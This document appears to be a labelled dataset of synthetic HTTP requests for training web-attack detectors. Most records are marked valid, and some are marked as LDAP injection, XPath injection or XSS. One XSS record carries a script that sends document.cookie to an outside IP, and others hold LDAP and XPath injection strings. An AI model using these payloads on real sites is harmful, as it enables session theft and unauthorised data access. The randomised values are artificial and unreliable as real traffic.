If-Unmodified-Since: Mon, 12 Jan 09 17:15:17 CET
If-Match: "xHMx@ZIN_n8NP5ZkUO.a"
If-None-Match: *
If-Range: Sun, 07 Oct 07 09:28:22 CET
Max-Forwards: 9949
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic b2Z5bklpNTpnZnNkRA==
Authorization: NTLM clJ0bmk1bGVlODRzdWllbmRla2U1ZTF1aWVlYWFlZXRsYWF6ZG56OWNqOXRhYXRu
Range: -652120,9-,091-
Referer: http://www.xeaqes.it/tnesqW3.fgf
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.1 (X11; U; SunOS sun4u 2.3; yb-ac; rv:6.6.0) Gecko/05314125
UA-CPU: MIPS
UA-Disp: 565,1583,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 942x4490
Via: wruady/4.0 216.23.56.93
Transfer-Encoding: gzip
Upgrade: 2qpnf/0.0, mrmr/9.5, uql/4.8, rtnga/2.2, nj9ne/2.7
Warning: 209 www.atoDlsAt.htm "lwrhisc1S" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 87401
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16377
Start - Id: 18087
class: Valid
GET /nEmDJ@YebxKC3Mkz/Qi5L0mC.shtml?klel=e358rD&irtg2hh=aomdlsrk&BbcZu1IgWVBP=dgv4liZr4uz&smemsBuohtnfm=aLRQW2uN2eV&ethlpdaT7=cUnthferasthsddCrr&idajhondsas3qn=+tdi%5D%29+rn HTTP/1.1
Host: 42.118.125.227
Connection: keep-alive
Accept: text/plain, application/zip
Accept-Charset: x-mac-arabic, utf-7;q=0.1, x-mac-roman, windows-1257;q=0.6, iso-2022-jp
Accept-Encoding: compress, deflate;q=0.7, gzip;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 117.155.55.63
Cookie: cetS=cobjectncr
Cookie2: $Version="5"
Date: Wed, 14 Sep 05 24:39:22 UTC
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: eprCieoo=fsdos
From: as4ao3rt@lnnha.gov
If-Modified-Since: Sun, 09 Mar 08 10:58:24 CET
If-Unmodified-Since: Fri, 13 Jan 06 09:39:57 CET
If-Match: "uD9GQWnK1.WeSgj8d"
If-None-Match: *
If-Range: "9gSPc49toGp5EYiBx.3m"
Max-Forwards: 985
MIME-Version: 9.3
Pragma: aok=aartDo
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: NTLM aGVzTWhFcmNqbmxnb2U1ZXpldGlhbVQwbmhFZW90b2hzeW80Yg==
Range: 05487-,314421-,-1481
Referer: http://www.iero.be/qmta/yahAtau.mspx
TE: gzip
Trailer: Accept-Encoding
User-Agent: o0erCah9nmhal
UA-CPU: MIPS
UA-Disp: 2004,7271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 022x8341
Via: 8.7 205.12.233.92, 3.8 www.tssit.shtml, 3deiwb/9.6 www.ilsto.jpg
Transfer-Encoding: deflate
Upgrade: dad/1.8, foyho2/4.1
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 7309979
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18087
Start - Id: 8395
class: Valid
GET /jkus4scnxteecKceah/sDQ6tnsN.5WB/3v@-M/s1cPeYNBsiu@JK/eradtrNcnmT5fsc4Gr/jgwOoo/tht9inces/nDdsooIishthtnf6e/eUIeersetle/OI/h2Gi.nsf?aaorheoechps=fedsnent&deuex42vy4a=processing-instructionhi%2B&t4Ixfe2=eZnearbkr.&aiper=3u7uyMtA&esykoItbaoiei=N1tlehoee&inp01eioquNi1=utsnitaniKdl7tfi&yeisdvmej3=reG%26dxtc%5Dt%28hu&zkpv=EtEana8i&9qeoeee6ntdsla=b2astl&Qn5d6PmaaK=wtatscjymH4&u9jhgisih8he=tmI%28wp-&JZALetoptF2aSl=tif&m4hnoTh9nH=40&ueulte3oiafq=3834&98g0z@mecho=cjrsie65nph-%24ir HTTP/1.0
Host: 251.122.61.56
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip;q=0.9
Accept-Language: c6-lepd, L-aKe1s, Wa-u;q=0.8
Cache-Control: no-cache
Client-ip: 36.109.39.91
Cookie: 1AH5DNmf@Ndz=e6;atsoetimdRp5mno=Die3mfeltcfiuOusW;6yneAOtv=vdtibsdidaae;hnvequoOabtier=p4Em
Cookie2: $Version="05"
Date: Sat, 02 Aug 08 01:20:25 GMT
ETag: W/"yMsnma215J4vBEp"
Expect: itte2pI
From: eeqsa@nsrtpHttai.com
If-Modified-Since: Tue, 27 Nov 07 23:50:47 CET
If-Unmodified-Since: Tue, 27 Nov 07 17:14:14 CET
If-Match: "Pw1Yol3dXZRLsqANK67"
If-None-Match: "f6wTSS6y14s4hIv"
If-Range: "driQburhWrukrhl"
Max-Forwards: 8346
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: Digest nonce
Range: 994131-66069
Referer: http://www.yi78xE.gov/eCnoqau.pdf
TE: gzip;q=0.0
Trailer: Warning
User-Agent: 2nhe (c-w@JEpA; gXu@L9; h9vIpR; xLU7Cl; fwihZc.q)
UA-CPU: MIPS
UA-Disp: 755,5837,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 928x374
Via: 0.2 96.4.66.200:9, 6rhda7/9.2 www.csydael.shtml:5587, FTP/8.1 www.tRcbie.htm
Transfer-Encoding: gzip
Upgrade: babste/4.1
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 5442367838332838
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8395
Start - Id: 37341
class: LdapInjection
GET /hh/igVo@uG2PAKyPeYSUj5e/tzCr6LbP6Ar7VB8/awegfsegstTmlbdefc/ehiabteccr4q6onslwMr/eMsUxZpMKwD-bQNaxk.html?eyndse=uIhKFNO0yyH2&EA29-=hemnph-&SstN=ea3a%29%2Bprocessing-instructionconnectibsform5&68uaaoNiueAsB=sBBXZ3Z&Lbdboca6lItne=ench&otceaapNn9leb=5&-PlW=S%29N%7Cre0s+oySdndrop0&bnttereu6odAu=+r HTTP/1.0
Host: www.ni1il.gov:80
Connection: leeetR
Accept: text/*, image/gif, text/xml
Accept-Charset: x-mac-chinesetrad;q=0.7, x-mac-chinesesimp;q=0.7, windows-1252;q=0.8, iso-10646-ucs-2, iso-8859-9;q=0.7
Accept-Encoding: ) (|   (   cn=*o  'brien*)(mail    =*o  'brien*   )  
Accept-Language: *;q=0.2
Cache-Control: min-fresh=06
Client-ip: 183.224.73.87
Cookie: fcjoydip=ecrdgns;urq4=we@a?thaving;imp0dom
Cookie2: $Version="7"
Date: Thu, 25 Feb 10 24:01:39 CET
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: elbo@eieuetfntT.fr
If-Modified-Since: Tue, 08 Jun 04 08:57:59 CET
If-Unmodified-Since: Fri, 31 Mar 06 18:16:10 UTC
If-Match: "zkoHilhRy4kTrL8q"
If-None-Match: *
If-Range: Wed, 22 Apr 09 08:54:59 GMT
Max-Forwards: 44
MIME-Version: 7.2
Pragma: aeo=fact
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: Digest qop=auth-int
Range: 54145-,-678850
Referer: http://Tnoa.uk/alIq/icnssA/e1jM/eednna7t.pl
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/3.2 (X11; U; Linux i386 5.0; te-ut; rv:6.3.9) Gecko/44125497
UA-CPU: 68000
UA-Disp: 654,6538,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: 5.7 202.148.167.117, HTTP/0.3 www.niiajtnt.jpeg, 2.3 77.62.169.178
Transfer-Encoding: deflate
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37341
Start - Id: 38699
class: LdapInjection
GET /lovx7AleDo/m7yZr28o4U/eu6tlll3otebtaen/lAr8qssq5BA/lF0exI/cidabpao7iR/ybtlt9vae/rkJy@s.asp?arutue0rms=s%40tltr4NoonMn&a4x6=nttvobjectUhsimglocationi&aricockc=e&A4qotddr=%29%28%7C%28cn%3D*o+++%27brien*++++%29%28mail++++%3D*o+%27brien*++%29&heo94s7=aa3paTeu7+&sec6iOnmoa=e%5Domzn5&ev9ntnugsCrCet=180727&asetyh=24 HTTP/1.0
Host: www.aGaNris.fr
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale=6564
Client-ip: 218.181.248.159
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="63"
Date: Wed, 19 Mar 08 21:44:43 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: 100-continue
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Wed, 18 Mar 09 01:57:21 GMT
If-Unmodified-Since: Sun, 28 Mar 04 17:24:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 5
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: Digest realm
Authorization: Basic aGl1RXJuQTpyYVR0cg==
Range: 32-1,3888-481886
Referer: /6oli/tta2q/nrcnh7t/y4Mt/sxItet.rar
TE: deflate;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: cdnk7uz (mtgymOmX; sbu6v636z)
UA-CPU: PowerPC
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: HTTP/3.6 196.109.23.247, FTP/9.6 www.8tt8.jpg:46, HTTP/5.7 151.63.72.63:0
Transfer-Encoding: deflate
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38699
Start - Id: 1666
class: Valid
GET /.lperlMmochaajPo/5mail4MnCGI/OwninznG1ecigvtni2m/e_aCBg1/aS/aKyIEBGInCA@_u/4Eame5ttitztj2sAtew.png?tlauddp7=noDruOlwePh7&iirei4nbdioC=mobleNE%26asCnt&5daabIhhare=yu+rot&usarswrig5na=txh%25wngroup+bylV5nh&0scy=985565385&ducwEhnonrwumon=u7-.5SNWNRjN&AaYob=Zsaectyv&rnieoi=4dih&Qorcbin7window.open=980071&ufpHc8=ss&rwtu=lcatRa5owp-gtq%26tetr%3C&XUblocationthb0BRw=u&A8pkbv@@lFL=sR1_OA HTTP/1.0
Host: www.egnoot.cz:80
Connection: close
Accept: text/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 51.43.38.151
Cookie: ut0u= ct<7nxas;iEtoaoteFt=fyudksaee;uiozwa=71546109;cirewi=sn?Jsso;Agh9s=yrro;obyetusanatnd=sZWExVxu8b
Cookie2: $Version="23"
Date: Sat, 26 Dec 09 19:20:03 UTC
ETag: W/"gn5L@kHETqToPwgC"
Expect: 100-continue
From: irssarta@oehXEem.gov
If-Modified-Since: Wed, 20 Dec 06 17:37:14 CET
If-Unmodified-Since: Mon, 18 Jun 07 16:29:40 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jun 06 24:46:19 UTC
Max-Forwards: 155
MIME-Version: 9.8
Pragma: c9htdteh='h3gb'
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: Digest cnonce="dnaueie"
Range: 73-
Referer: http://www.bj9hRih.ch/yhts/ad4rifp/e7eEabsS.sh
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 3.5; iO-ts; rv:2.8.0) Gecko/29754581
UA-CPU: 68000
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3512x868
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: deflate
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 713 www.liacs.shtml "tenh1oogsntt7wsMck" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1666
Start - Id: 19447
class: Valid
GET /JObZ0ot4esoy/renetE8c/8@RRN/dLF/e9itx59dJ1xBX/xiccfcwl/dwyzGjt.shtml?mg=%26&5pkaat4=3932220&f8cmohapih=%3Fr%3FF&rCdinc=01498&L7i=65541987&3R0fIV=9992&duethd=8394637456&shunnio=693 HTTP/1.1
Host: www.tutre.biz
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-icelandic, iso-8859-7;q=0.0, x-mac-chinesetrad;q=0.3
Accept-Encoding: 
Accept-Language: eorv2rt-ein8h, sh0-se;q=0.9, omt7En-swae, Atemo-il, ohzqtEp-cntT
Cache-Control: no-store
Client-ip: 168.104.135.23
Cookie: sajodhcrrfsy=8hvhe7l
Cookie2: $Version="7"
Date: Mon, 25 Feb 08 06:38:13 UTC
ETag: W/"XOUTb51DsgF6vw2B"
Expect: ii4Il=cr9ndt;ddle7
From: 6eot@yipWaeAxA.cz
If-Modified-Since: Sun, 13 May 07 09:15:38 GMT
If-Unmodified-Since: Mon, 31 May 04 15:27:21 CET
If-Match: "QPPMFJs3TtqAvUJo3"
If-None-Match: "l6u7beqRUmUuaDw6B"
If-Range: Thu, 15 Jan 04 18:16:06 UTC
Max-Forwards: 135
MIME-Version: 8.7
Pragma: dqara=oIDhote
Proxy-Authorization: 3sbeS dvsesc=eiTj2
Authorization: NTLM bXRvaHJwZWFvZUJhbnBtaGl3TmFxbm5hZWNmdG51czdvZXJh
Range: -5,725866-,-2
Referer: /qs8tjnp/n6odsr/qtsra/ltdur/07tsrae.asp
TE: trailers
Trailer: Upgrade
User-Agent: stoefotn/9.5.5
UA-CPU: x86
UA-Disp: 915,682,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6480x436
Via: HTTP/6.6 16.194.26.138, 2.9 www.sCur.css, nrua/7.9 www.p7emse.jpeg
Transfer-Encoding: ue4ea; 7nRsmii4=oc4t
Upgrade: 3tDr/0.3, octa/6.4
Warning: 889 www.tpb2d.html "1p2mfhiat" 
X-Forwarded-For: 83.131.31.88
X-Serial-Number: 219251362727568
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19447
Start - Id: 28593
class: Valid
GET /or0g/trrtlonnlhmfqioalsaa/wgetfWA./AFoMvcbyI/dzB/auhsubAg9s/gtnoehestsota.tiff? HTTP/1.0
Host: www.hFdorwaldh.fr:80
Connection: tGsntrce
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 119.98.72.77
Cookie: wtsrearr=095576547;g7hrwlez3auy=664722719;uR=ii5
Cookie2: $Version="23"
Date: Mon, 18 Jun 07 08:08:59 CET
ETag: "NcioNvz7YIdfPzPVN"
Expect: 100-continue
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Fri, 24 Mar 06 18:00:20 CET
If-Unmodified-Since: Sat, 18 Dec 04 08:53:49 CET
If-Match: ".AGyGzZwCLM.2GeNG-"
If-None-Match: "AH9uAZsBX70qsfa9AL@R"
If-Range: Sat, 03 Apr 04 02:13:43 GMT
Max-Forwards: 02
MIME-Version: 1.3
Pragma: s='acpnnnl'
Proxy-Authorization: Digest algorithm=MD5
Authorization: ixbtei ter6aamp=aCi2eesc
Range: 2633-,-60,78094-0
Referer: /rt05nr9/SWsd.wav
TE: trailers
Trailer: Cache-Control
User-Agent: eoht (wtvIuEWfMf; acY.kNKUa; ppggQbGv; lQHJiQf@; alz85Qkns)
UA-CPU: MIPS
UA-Disp: 224,8180,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2416x4486
Via: 9.9 www.rnfs.css
Transfer-Encoding: compress
Upgrade: thto1/0.0, nre/1.4
Warning: 221 www.1et65lOl.htm:396 "oiug" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 37650652134780806
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28593
Start - Id: 12560
class: Valid
GET /jcIOfx5wmQQ0Yr/yV8DgDqms67c_r/D80@YLj/liiTfmne7k1qxa5ube/0SYKuS/aeMvr8shTr7n2AUqPha/hM0EnmfVp4/RY6H/yy0v2kBOzGtOrtD5Jpd/91eioowq5mqnzlriha/d-Y7VO9OWU/pJ-0bY4MV.shtml?vtqG34FC-rN=229&r3wl=67528&atvbgaiiein=uoi HTTP/1.1
Host: 160.75.180.156:77567
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 157.23.61.107
Cookie: ehtesegdae=erDj;sr=r  wp-'na3an;mu0UiW7=4654
Cookie2: $Version="91"
Date: Fri, 01 Aug 08 12:41:12 UTC
ETag: W/"H8QW.ECYlsVSh.Lsv"
Expect: t5msite
From: oaii@fHeu.uk
If-Modified-Since: Mon, 19 Mar 07 09:53:30 GMT
If-Unmodified-Since: Sat, 07 Nov 09 11:45:30 GMT
If-Match: *
If-None-Match: "sPrXlGCc9kxOUdOTeeW"
If-Range: Fri, 03 Oct 08 11:05:13 UTC
Max-Forwards: 6630
MIME-Version: 8.2
Pragma: ie=nf
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: NTLM T3NjaWd0cnNJMG90ZHJ0cWVoNXRvOG5kN3Q2YWRmaWRibHdkdFNpdXNlZ29zem8=
Range: 86503-,-067547,349937-
Referer: /esw8at1/s2mi/m9wmlf.mdb
TE: trailers
Trailer: Via
User-Agent: Nse7a1olttH
UA-CPU: 68000
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 366x415
Via: FTP/0.8 217.161.150.156, 9.4 241.228.140.23, FTP/7.4 www.oqchm.gif
Transfer-Encoding: gzip
Upgrade: a1e0oe/8.1, dhoae/6.1
Warning: 997 www.ce9up3.htm "ertyen49aeinh" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12560
Start - Id: 1550
class: Valid
GET /Trm/ya0vmocha3aO7V42Z/zmg3iit0rEbece/rCTLlaCt/6Nmhi/fjhhltuesssliuiishu6/acIstuoiaadomi1ronsg/wrsehxnouswbnchnu.dll?flieeeae=796039492&zo=tiAwherep%2Buho&C-documentdr7b=update&rasiwuesKetP=dfEasicthicerfooe&lbllTeihtcIW=shbstsd&nO7Pmv=yor&J3aChgenS=SiN&oggwj=p4ics9aVVG HTTP/1.1
Host: 105.224.35.105
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, cp-936, windows-874, windows-1255;q=0.0, iso-2022-jp
Accept-Encoding: identity, deflate;q=0.9, identity;q=0.3, compress;q=0.3
Accept-Language: gtyyoEk-n;q=0.6, aswsntbm-ttcolo;q=0.0, a-oE;q=0.9, nja-eermi, eoi-lvf
Cache-Control: max-age=137
Client-ip: 185.157.234.182
Cookie: tyseb=1336
Cookie2: $Version="374"
Date: Wed, 04 Feb 04 15:42:21 CET
ETag: "PjSX4lqqUOqurFvPs4P"
Expect: meYira=tis4mexm;eieUm
From: uared@sesbwap.com
If-Modified-Since: Sat, 27 Aug 05 09:57:07 UTC
If-Unmodified-Since: Mon, 27 Apr 09 22:24:11 CET
If-Match: *
If-None-Match: "nl2gRWTFP4Rmg-iE"
If-Range: Wed, 11 Jul 07 01:37:54 UTC
Max-Forwards: 176
MIME-Version: 8.2
Pragma: ta=8teene
Proxy-Authorization: Basic b3lvcnJVenI6VWRIMUQ=
Authorization: NTLM ZHNwdXljcGRxb2hpcmw2eTJkdDNsc3Nsb3R0aWl4cmE=
Range: -16609
Referer: http://www.Oniajj.biz/trhuke/iLanEss.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.2 (X11; U; Unix 9.1; oo-6e; rv:0.0.3) Gecko/94951488
UA-CPU: PowerPC
UA-Disp: 048,2159,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: FTP/4.0 www.tiymNlns.css
Transfer-Encoding: compress
Upgrade: ameA/9.9, rzoIer/1.8, llO2/3.9, Oyt/1.5
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1550
Start - Id: 47794
class: XSS
GET /oSsei/ZkYTX/zhRhzethrT/sK0-Pm4p.3/ladscwXeaur.cgi?ehicewnlv8e=aus9eeeDtndTyin&jV9passwdmZ9oK1=lhnafaj2dsalssge&t7el=gs+&r4nt8=3275&sIrt=Se%7Czc&ytEig4=aycfthneee%265Dep&oTeucioh=8aetngHennomietsmf&0nuam6nh=555890878&bwuitH4bTe7o=+lsekr%2Btscripte%3Fdw+wtqzt&lHOdiv=ecat&yawa=euyMc&i6=RreWtAAo&1xna=keDnvobssmetsHnuw&FuW227lV7AZo=%3C%21--+--+--%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F98.55.68.31%2Fmesita.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&torr=536 HTTP/1.1
Host: www.aef5ea.cz
Connection: iqptoh
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: htther-itnhr4, iozOO-tcMtdor, roo6r-to4ihora, Ww-xv, nt03isne-6nzlb
Cache-Control: uoEdnh=loaNas
Client-ip: 14.45.21.194
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="10"
Date: Wed, 10 Sep 08 10:18:02 CET
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Sat, 03 Nov 07 16:38:44 CET
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: *
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: Thu, 31 Jan 08 11:00:55 CET
Max-Forwards: 2160
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: 9moa lbh0=lnmeeet
Range: 0291-093,-6139,9552-451245
Referer: /rtpiehp.mp3
TE: deflate,deflate;q=0.9,trailers
Trailer: Accept-Language
User-Agent: HtoS/9.0
UA-CPU: x86
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 876x886
Via: 3.7 57.239.25.118
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47794
Start - Id: 2442
class: Valid
GET /lgneos3lstnol/9gXpsxFbxikdwhere/sSl6/ttslataeexdep.js?laratht=6e%24Ss%28eopenetdiexect%7Eoiu&ibhhmIetuhNc=uhomeoss&VmioewrbI=iugwaeyi&urFWFuJucatR=196770&9Dimggk=oj7&Ui1-6dLyNQ7O=tol&iosist3aynT4e=562929936&ntsiddidsNEC4r=mh1Pgf&es8Asn33eihtug=sntpnn HTTP/1.1
Host: 192.56.119.86:80
Connection: otvd5fpz
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic;q=0.2, windows-1253
Accept-Encoding: identity, gzip;q=0.9, deflate, gzip
Accept-Language: ebo-yaLJll;q=0.5, rm-8cUwu2zn;q=0.2, ee-ti3lur;q=0.4, dr-ztbm5im;q=0.9
Cache-Control: max-stale=9258
Client-ip: 17.92.203.155
Cookie: rhqropiueaf=9;hhUecebhit1yGn=e@GLqQVW;sec=903669;FreplaceMfbTqcHp7a=24010
Cookie2: $Version="692"
Date: Fri, 21 May 04 01:54:34 GMT
ETag: W/"uxVimR45.qMcKbzLcPP3"
Expect: ofld=1vaEplnp;ehzrxmsC=rzsh7r4
From: i6anwg@6eqonb.st
If-Modified-Since: Mon, 09 Nov 09 23:19:15 CET
If-Unmodified-Since: Tue, 20 Sep 05 14:12:45 GMT
If-Match: "gkMcErlSp2UA8-fRMgo"
If-None-Match: *
If-Range: *
Max-Forwards: 723
MIME-Version: 8.3
Pragma: ascueerw='45eddh'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM ZXR1dDAzaDUza2xnYTRnNmFvbjBpa3VyZXRUaWFvRWFqb3NvcEdkb0pFYWdtZQ==
Range: 4069-,-41
Referer: http://www.0aDnn.ch/tApesei/Y2h9/owee7.gz
TE: chunked;q=0.4
Trailer: Via
User-Agent: eIaxpr (v2_lnXiaS; t9LKE4B_QZ)
UA-CPU: x86
UA-Disp: 012,6333,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 750x609
Via: FTP/5.6 229.42.184.92, HTTP/8.5 114.178.100.206
Transfer-Encoding: 9nntr
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 861 www.bgseo.shtml "IrtAieAiic" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2442
Start - Id: 38190
class: LdapInjection
GET /erasneeoiez.tiff?bhdoetstohit=33032388&IotTyiram1wt=968679&7m=%29+++%28%7C++++%28displayName%3Dhad*%29+++%28name%3D++had*%29%28+++mail%3Dhad*+++%29&hnomuaa5e7ai=aatgeeg%29siu7aa%29+yf7 HTTP/1.1
Host: 21.59.152.56
Connection: hiu2u
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.1
Accept-Language: oFs-th9lhtpx
Cache-Control: no-transform
Client-ip: 186.3.228.230
Cookie: hwcuyaoeots5= hy;hrr2enaspmsW=ty
Cookie2: $Version="50"
Date: Tue, 06 Apr 04 02:29:08 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: anoae=Rywdsuv
From: nethi@otsenrjp.biz
If-Modified-Since: Tue, 23 Mar 10 23:40:38 CET
If-Unmodified-Since: Wed, 04 Jun 08 21:23:40 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Feb 04 01:59:53 GMT
Max-Forwards: 818
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: Basic SG51N2U6ZXNFbnJm
Range: -49,281-
Referer: /neum/hOchu/crElu4nt/9nsn.swf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 1.3; ey-eu; rv:6.3.2) Gecko/93876344
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38190
Start - Id: 49777
class: XPathInjection
GET /srepeegznbe/locepo/ubygkcP_1/hrtO2nc2kkawaeg/tiEbExe/a-aVvwC7CA/paes4oitdricseeae/3bIYYzaGpx@SCp7f/in6@3R9IdJUzrxOu/afYKPkSrk6J.gif?8ohlseamket1=awepristdinsORpl7eI&xee=ad&axtaRai=hsrChttt%27+or+++%28i++%3C+++count%28uno%2Fchild%3A%3Atext%28%29%29++++and+++++j++++%3C++count%289Ynde%2Fchild%3A%3Acomment%28%29%29++and+k+++++%3C+++count%28nlhwnp%2Fchild%3A%3A*%29++%29+++++or++++%27ldRdoadF%27+++%3D++++%27+ftoit%27++or&oonuyr=619 HTTP/1.1
Host: 139.173.223.236
Connection: titoni0
Accept: */*
Accept-Charset: iso-8859-9, windows-1254, x-mac-roman, x-mac-greek;q=0.1, windows-1251;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: Ahoix-7c3rsoe, cie-tuti;q=0.6, stcsoee-hioaain, wodae-qCi;q=0.3, Xt-leoF8n
Cache-Control: no-store
Client-ip: 227.62.139.89
Cookie: oeoieonrmpEi=oiCdhleusrmfiphpboot.inien;3dz-435KV=r9aBntOjeirh;betA3=bodytuN;eOpucgdtaemit=dk~;Teegoieb=5142534
Cookie2: $Version="4"
Date: Wed, 27 Dec 06 03:58:56 GMT
ETag: "1nP4Bu6v9ApZYEoCkX5p"
Expect: iedo=iysauhb
From: kixt4@OksejLmn.cz
